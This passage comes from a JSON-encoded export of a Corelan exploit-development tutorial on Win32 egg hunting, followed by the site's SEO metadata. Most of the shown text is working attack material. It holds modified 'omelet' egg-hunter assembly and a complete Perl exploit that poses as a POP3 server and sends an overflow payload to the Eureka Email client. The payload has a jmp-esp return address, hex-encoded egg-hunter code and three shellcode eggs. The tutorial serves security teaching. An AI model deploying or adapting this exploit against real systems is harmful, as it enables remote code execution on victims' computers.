matches)\nmarker_bytes_location equ $-3 - $$\n  CMP     EAX, BYTE max_index     ; Check if the value of EAX is &lt;= max_index\nmax_index_location equ $-1 - $$\n  JA      reset_stack             ; No -&gt; This was not a marker, continue scan\n  POP     ECX                     ; ECX = egg_size\n  IMUL    ECX                     ; EAX = egg_size * egg_index == egg_offset\n  ; EDX = 0 because ECX * EAX is always less than 0x1,000,000\n  ADD     EAX, [BYTE FS:EDX + 8]  ; EAX += Bottom of stack (FS:[8]) ==\n                                  ;      position of egg in shellcode.\n  XCHG    EAX, EDI\ncopy_loop:\n  REP     MOVSB                   ; copy egg to basket\n<strong><span style=\"color: #ff0000;\">  CMP     EBX, 0xFFFFFFFF         ; ** Added : see if we have found all eggs\n  JE      done                    ; ** Added : If we have found all eggs,\n                                  ; **         jump to shellcode\n  INC     EBX                     ; ** Added : increment EBX\n                                  ; **         (if we are not at the end of the eggs)<\/span><\/strong>\n  MOV     EDI, ESI                ; EDI = end of egg\n\nreset_stack:\n; Reset the stack to prevent problems caused by recursive SEH handlers and set\n; ourselves up to handle any AVs we may cause by scanning memory:\n  XOR     EAX, EAX                ; EAX = 0\n  MOV     ECX, [FS:EAX]           ; ECX = SEH_chain =&gt; SEH_frames[X]\nfind_last_SEH_loop:\n  MOV     ESP, ECX                ; ESP = SEH_frames[X]\n  POP     ECX                     ; ECX = SEH_frames[X].next_frame\n  CMP     ECX, 0xFFFFFFFF         ; SEH_frames[X].next_frame == none ?\n  JNE     find_last_SEH_loop      ; No \"X -= 1\", check next frame\n  POP     EDX                     ; EDX = SEH_frames[0].handler\n  CALL    create_SEH_handler      ; SEH_frames[0].handler == SEH_handler\n\nSEH_handler:\n  POPA                            ; ESI = [ESP + 4] -&gt;\n                                  ;     struct exception_info\n  LEA     ESP, [BYTE ESI+0x18]    ; ESP = struct exception_info-&gt;exception_addr\n  POP     EAX                     ; EAX = exception address 0x????????\n  OR      AX, 0xFFF               ; EAX = 0x?????FFF\n  INC     EAX                     ; EAX = 0x?????FFF + 1 -&gt; next page\n  JS      done                    ; EAX &gt; 0x7FFFFFFF ===&gt; done\n  XCHG    EAX, EDI                ; EDI =&gt; next page\n  JMP     reset_stack\ndone:\n  XOR     EAX, EAX                ; EAX = 0\n  CALL    [BYTE FS:EAX + 8]       ; call the bottom of the stack (FS:[8]),\n                                  ;    where the eggs were reassembled.\n\n    db      marker_bytes_location\n    db      max_index_location\n    db      egg_size_location<\/pre>\n<p>You can download the tweaked code here :<\/p>\n<p>[download 
id=55]55[\/download]<\/p>\n<p>Compile this modified code again, and recreate the eggs :<\/p>\n<p><em>\"c:\\program files\\nasm\\nasm.exe\" -f bin -o w32_omelet.bin w32_SEH_corelanc0d3r_omelet.asm -w+error <\/em><\/p>\n<p><em>w32_SEH_omelet.py w32_omelet.bin shellcode.bin calceggs.txt 127 0xBADA55<\/em><\/p>\n<p>Copy the omelet code from the newly created calceggs.txt file and put it in the exploit.<\/p>\n<p>Exploit now looks like this :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">use<\/span> Socket;\n#fill out the <span style=\"color: #0000ff;\">local<\/span> IP or hostname\n#which is used by Eureka EMail as <span style=\"color: #0000ff;\">POP<\/span>3 server\n#note : must be exact match !\n<span style=\"color: #0000ff;\">my<\/span> $localserver = \"<span style=\"color: #8b0000;\">192.168.0.193<\/span>\";\n#calculate <span style=\"color: #0000ff;\">offset<\/span> to EIP\n<span style=\"color: #0000ff;\">my<\/span> $junk = \"<span style=\"color: #8b0000;\">A<\/span>\" x (723 - <span style=\"color: #0000ff;\">length<\/span>($localserver));\n<span style=\"color: #0000ff;\">my<\/span> $ret=<span style=\"color: #0000ff;\">pack<\/span>('V',0x7E47BCAF); #jmp esp from user32.dll\n<span style=\"color: #0000ff;\">my<\/span> $padding = \"<span style=\"color: #8b0000;\">\\x90<\/span>\" x 1000;\n\n<span style=\"color: #0000ff;\">my<\/span> $omelet_code = \"<span style=\"color: #8b0000;\">\\xbb\\xfd\\xff\\xff\\xff<\/span>\".   #put 0xfffffffd in ebx\n\"<span style=\"color: #8b0000;\">\\xEB\\x2C\\x51\\x64\\x89\\x20\\xFC\\xB0\\x7A\\xF2\\xAE\\x50<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x89\\xFE\\xAD\\x35\\xFF\\x55\\xDA\\xBA\\x83\\xF8\\x03\\x77<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x15\\x59\\xF7\\xE9\\x64\\x03\\x42\\x08\\x97\\xF3\\xA4<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x81\\xFB\\xFF\\xFF\\xFF\\xFF<\/span>\".   
# compare EBX with FFFFFFFF\n\"<span style=\"color: #8b0000;\">\\x74\\x2B<\/span>\".   #<span style=\"color: #0000ff;\">if<\/span> EBX is FFFFFFFF, jump to shellcode\n\"<span style=\"color: #8b0000;\">\\x43<\/span>\".       #<span style=\"color: #0000ff;\">if<\/span> not, increase EBX and <span style=\"color: #0000ff;\">continue<\/span>\n\"<span style=\"color: #8b0000;\">\\x89\\xF7\\x31\\xC0\\x64\\x8B\\x08\\x89\\xCC\\x59\\x81\\xF9<\/span>\".\n\"<span style=\"color: #8b0000;\">\\xFF\\xFF\\xFF\\xFF\\x75\\xF5\\x5A\\xE8\\xBE\\xFF\\xFF\\xFF<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x61\\x8D\\x66\\x18\\x58\\x66\\x0D\\xFF\\x0F\\x40\\x78\\x06<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x97\\xE9\\xD8\\xFF\\xFF\\xFF\\x31\\xC0\\x64\\xFF\\x50\\x08<\/span>\";\n\n<span style=\"color: #0000ff;\">my<\/span> $egg1 = \"<span style=\"color: #8b0000;\">\\x7A\\xFF\\x55\\xDA\\xBA\\x89\\xE2\\xDA\\xC1\\xD9\\x72\\xF4\\x58\\x50<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x59\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5A\\x56\\x54\\x58\\x33<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x30\\x56\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x58<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x50\\x38\\x41\\x43\\x4A\\x4A\\x49\\x4B\\x4C\\x4A\\x48\\x50\\x44\\x43\\x30\\x43\\x30<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x45\\x50\\x4C\\x4B\\x47\\x35\\x47\\x4C\\x4C\\x4B\\x43\\x4C\\x43\\x35\\x43\\x48\\x45<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x51\\x4A\\x4F\\x4C\\x4B\\x50\\x4F\\x42\\x38\\x4C\\x4B\\x51\\x4F\\x47\\x50\\x43\\x31<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4A\\x4B\\x51\\x59\\x4C\\x4B\\x46\\x54\\x4C\\x4B\\x43<\/span>\";\n\n<span style=\"color: #0000ff;\">my<\/span> $egg2 = \"<span style=\"color: 
#8b0000;\">\\x7A\\xFE\\x55\\xDA\\xBA\\x31\\x4A\\x4E\\x50\\x31\\x49\\x50\\x4C\\x59<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4E\\x4C\\x4C\\x44\\x49\\x50\\x43\\x44\\x43\\x37\\x49\\x51\\x49\\x5A\\x44\\x4D\\x43<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x31\\x49\\x52\\x4A\\x4B\\x4A\\x54\\x47\\x4B\\x51\\x44\\x46\\x44\\x43\\x34\\x42\\x55<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4B\\x55\\x4C\\x4B\\x51\\x4F\\x51\\x34\\x45\\x51\\x4A\\x4B\\x42\\x46\\x4C\\x4B\\x44<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4C\\x50\\x4B\\x4C\\x4B\\x51\\x4F\\x45\\x4C\\x45\\x51\\x4A\\x4B\\x4C\\x4B\\x45\\x4C<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4C\\x4B\\x45\\x51\\x4A\\x4B\\x4D\\x59\\x51\\x4C\\x47\\x54\\x43\\x34\\x48\\x43\\x51<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4F\\x46\\x51\\x4B\\x46\\x43\\x50\\x50\\x56\\x45\\x34\\x4C\\x4B\\x47\\x36\\x50\\x30<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4C\\x4B\\x51\\x50\\x44\\x4C\\x4C\\x4B\\x44\\x30\\x45<\/span>\";\n\n<span style=\"color: #0000ff;\">my<\/span> $egg3 = \"<span style=\"color: #8b0000;\">\\x7A\\xFD\\x55\\xDA\\xBA\\x4C\\x4E\\x4D\\x4C\\x4B\\x45\\x38\\x43\\x38<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4B\\x39\\x4A\\x58\\x4C\\x43\\x49\\x50\\x42\\x4A\\x50\\x50\\x42\\x48\\x4C\\x30\\x4D<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x5A\\x43\\x34\\x51\\x4F\\x45\\x38\\x4A\\x38\\x4B\\x4E\\x4D\\x5A\\x44\\x4E\\x46\\x37<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x4B\\x4F\\x4D\\x37\\x42\\x43\\x45\\x31\\x42\\x4C\\x42\\x43\\x45\\x50\\x41\\x41\\x40<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\".\n\"<span style=\"color: 
#8b0000;\">\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\";\n\n<span style=\"color: #0000ff;\">my<\/span> $garbage=\"<span style=\"color: #8b0000;\">This is a bunch of garbage<\/span>\" x 10;\n\n<span style=\"color: #0000ff;\">my<\/span> $payload=$junk.$ret.$omelet_code.$padding.$egg1.$garbage.$egg2.$garbage.$egg3;\n\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">Payload : <\/span>\" . <span style=\"color: #0000ff;\">length<\/span>($payload).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">Omelet code : <\/span>\" . <span style=\"color: #0000ff;\">length<\/span>($omelet_code).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\"> Egg 1 : <\/span>\" . <span style=\"color: #0000ff;\">length<\/span>($egg1).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\"> Egg 2 : <\/span>\" . <span style=\"color: #0000ff;\">length<\/span>($egg2).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\"> Egg 3 : <\/span>\" . 
<span style=\"color: #0000ff;\">length<\/span>($egg3).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n\n#set up listener on port 110\n<span style=\"color: #0000ff;\">my<\/span> $port=110;\n<span style=\"color: #0000ff;\">my<\/span> $proto=<span style=\"color: #0000ff;\">getprotobyname<\/span>('tcp');\n<span style=\"color: #0000ff;\">socket<\/span>(SERVER,PF_INET,SOCK_STREAM,$proto);\n<span style=\"color: #0000ff;\">my<\/span> $paddr=sockaddr_in($port,INADDR_ANY);\n<span style=\"color: #0000ff;\">bind<\/span>(SERVER,$paddr);\n<span style=\"color: #0000ff;\">listen<\/span>(SERVER,SOMAXCONN);\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Listening on tcp port 110 [POP3]... \\n<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Configure Eureka Mail Client to connect to this host \\n<\/span>\";\n<span style=\"color: #0000ff;\">my<\/span> $client_addr;\nwhile($client_addr=<span style=\"color: #0000ff;\">accept<\/span>(CLIENT,SERVER))\n{\n  <span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Client connected, sending evil payload\\n<\/span>\";\n  $cnt=1;\n  while($cnt &lt; 10)\n  {\n     <span style=\"color: #0000ff;\">print<\/span> CLIENT \"<span style=\"color: #8b0000;\">-ERR <\/span>\".$payload.\"<span style=\"color: #8b0000;\">\\n<\/span>\";\n\t <span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\"> -&gt; Sent <\/span>\".<span style=\"color: #0000ff;\">length<\/span>($payload).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n\t $cnt=$cnt+1;\n  }\n}\n<span style=\"color: #0000ff;\">close<\/span> CLIENT;\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Connection closed\\n<\/span>\";<\/pre>\n<p>Ok, the omelet code is slightly larger, and my changes could perhaps be improved a little, but hey:\u00a0 look at the result :<\/p>\n<p><a 
href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image47.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb47.png\" alt=\"image\" width=\"301\" height=\"162\" border=\"0\" \/><\/a><\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image48.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb48.png\" alt=\"image\" width=\"304\" height=\"227\" border=\"0\" \/><\/a><\/p>\n<p>pwned ! \ud83d\ude42<\/p>\n<h3>Training<\/h3>\n<p>This exploit writing series is accessible for free, and may have helped certain people one way or another in their quest to learn about Windows exploitation.\u00a0 Reading manuals and tutorials is a good start, but sometimes it\u2019s better to get things explained by experts, 101, during some sort of class or training.<\/p>\n<p>If you are interested in getting some class based training, check out https:\/\/www.corelan-training.com<\/p>\n<h3>All my thanks are belong to you :<\/h3>\n<p>My friends @ Corelan Team\u00a0 (Ricardo, EdiStrosar, mr_me, ekse, MarkoT, sinn3r, Jacky\u00a0 : you guys r0ck ! ) ,<\/p>\n<p>Berend-Jan Wever (a.k.a. SkyLined), for writing some great stuff,<\/p>\n<p>and thanks to everyone taking the time to read this stuff, provide feedback, and help others on <a href=\"https:\/\/www.corelan.be\/index.php\/forum\/writing-exploits\/\" target=\"_blank\" rel=\"noopener\">my forum<\/a>.<\/p>\n<p>Also, cheers to some other nice people I met on Twitter\/IRC over the last couple of months. 
(<a href=\"http:\/\/perpetualhorizon.blogspot.com\" target=\"_blank\" rel=\"noopener\">curtw<\/a>, <a href=\"http:\/\/twitter.com\/Trancer00t\/\" target=\"_blank\" rel=\"noopener\">Trancer00t<\/a>, <a href=\"http:\/\/www.room362.com\/\" target=\"_blank\" rel=\"noopener\">mubix<\/a>, <a href=\"http:\/\/twitter.com\/psifertex\/\" target=\"_blank\" rel=\"noopener\">psifertex<\/a>, <a href=\"http:\/\/twitter.com\/pusscat\" target=\"_blank\" rel=\"noopener\">pusscat<\/a>, <a href=\"http:\/\/www.metasploit.com\" target=\"_blank\" rel=\"noopener\">hdm<\/a>, <a href=\"http:\/\/twitter.com\/41414141\" target=\"_blank\" rel=\"noopener\">FX<\/a>, NCR\/CRC! [ReVeRsEr], <a href=\"http:\/\/bernardodamele.blogspot.com\" target=\"_blank\" rel=\"noopener\">Bernardo Damele<\/a>, <a href=\"https:\/\/web.archive.org\/web\/20130920235623\/http:\/\/www.abysssec.com:80\/blog\/?\" target=\"_blank\" rel=\"noopener\">Shahin Ramezany<\/a>, <a href=\"http:\/\/www.offensive-security.com\" target=\"_blank\" rel=\"noopener\">muts<\/a>, nullthreat, etc\u2026 )<\/p>\n<p>To some of the people I have listed here : Big thanks for responding to my questions or comments (it means a lot to me), and\/or reviewing the tutorial drafts\u2026<\/p>\n<p>Finally : thanks to anyone who showed interest in my work, tweeted about it, retweeted messages or simply expressed their appreciation in various mailinglists and forums.\u00a0 Spread the word &amp; make my day !<\/p>\n<p>Remember : Life is not about what you know, but about the will to listen, learn, share &amp; teach.<\/p>\n<p>Terms of Use applicable to this document : <a title=\"https:\/\/www.corelan.be\/index.php\/terms-of-use\/\" href=\"https:\/\/www.corelan.be\/index.php\/terms-of-use\/\">https:\/\/www.corelan.be\/index.php\/terms-of-use\/<\/a><\/p>\n<p>Copyright secured by Digiprove \u00a9 2010 Peter Van Eeckhoutte (certified 30 November 2010 21:27:13 UTC, Digiprove certificate P69462).<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Introduction Easter is still far away, so this is probably the right time to talk about ways to hunting for eggs (so you would be prepared when the easter bunny brings you another 0day vulnerability) In the first parts of this exploit writing tutorial series, we have talked about stack based overflows and how they &hellip; <a href=\"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> \"Exploit writing tutorial part 8 : Win32 Egg 
Hunting\"<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[244,245,127],"tags":[3736,3733,2786,2128,2096,2083,1977,1865,1834,1824,1817],"class_list":["post-2677","post","type-post","status-publish","format-standard","hentry","category-exploit-writing-tutorials","category-exploits","category-security","tag-encoder-decoder","tag-exploit-development-tutorial","tag-egghunter","tag-immunity-debugger","tag-alphanumeric","tag-unicode","tag-pvefindaddr","tag-seh","tag-shellcode","tag-metasploit","tag-eip"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Exploit writing tutorial part 8 : Win32 Egg Hunting - Corelan | Exploit Development &amp; Vulnerability Research<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Exploit writing tutorial part 8 : Win32 Egg Hunting - Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"og:description\" 
content=\"Introduction Easter is still far away, so this is probably the right time to talk about ways to hunting for eggs (so you would be prepared when the easter bunny brings you another 0day vulnerability) In the first parts of this exploit writing tutorial series, we have talked about stack based overflows and how they &hellip; Continue reading &quot;Exploit writing tutorial part 8 : Win32 Egg Hunting&quot;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/\" \/>\n<meta property=\"og:site_name\" content=\"Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/corelanconsulting\" \/>\n<meta property=\"article:published_time\" content=\"2010-01-09T18:57:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb30.png\" \/>\n<meta name=\"author\" content=\"corelanc0d3r\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@corelanc0d3r\" \/>\n<meta name=\"twitter:site\" content=\"@corelanc0d3r\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"TechArticle\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/\"},\"author\":{\"name\":\"corelanc0d3r\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\"},\"headline\":\"Exploit writing tutorial part 8 : Win32 Egg 
Hunting\",\"datePublished\":\"2010-01-09T18:57:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/\"},\"wordCount\":10532,\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/01\\\/image_thumb30.png\",\"keywords\":[\"encoder decoder\",\"exploit development tutorial\",\"egghunter\",\"immunity debugger\",\"alphanumeric\",\"unicode\",\"pvefindaddr\",\"seh\",\"shellcode\",\"metasploit\",\"eip\"],\"articleSection\":[\"Exploit Writing Tutorials\",\"Exploits\",\"Security\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/\",\"name\":\"Exploit writing tutorial part 8 : Win32 Egg Hunting - Corelan | Exploit Development &amp; Vulnerability 
Research\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/01\\\/image_thumb30.png\",\"datePublished\":\"2010-01-09T18:57:00+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/01\\\/image_thumb30.png\",\"contentUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/01\\\/image_thumb30.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.corelan.be\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Exploit writing tutorial part 8 : Win32 Egg Hunting\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"name\":\"Corelan CyberSecurity Research\",\"description\":\"Corelan publishes in-depth tutorials on exploit development, Windows 
exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.corelan.be\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\",\"name\":\"Corelan CyberSecurity Research\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"contentUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"width\":200,\"height\":200,\"caption\":\"Corelan CyberSecurity 
Research\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/corelanconsulting\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\",\"https:\\\/\\\/x.com\\\/corelanconsulting\",\"https:\\\/\\\/instagram.com\\\/corelanconsult\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\",\"name\":\"corelanc0d3r\",\"pronouns\":\"he\\\/him\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"caption\":\"corelanc0d3r\"},\"description\":\"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.\",\"sameAs\":[\"https:\\\/\\\/www.corelan-training.com\",\"https:\\\/\\\/instagram.com\\\/corelanc0d3r\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/petervaneeckhoutte\\\/\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\"],\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/author\\\/admin0\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->"
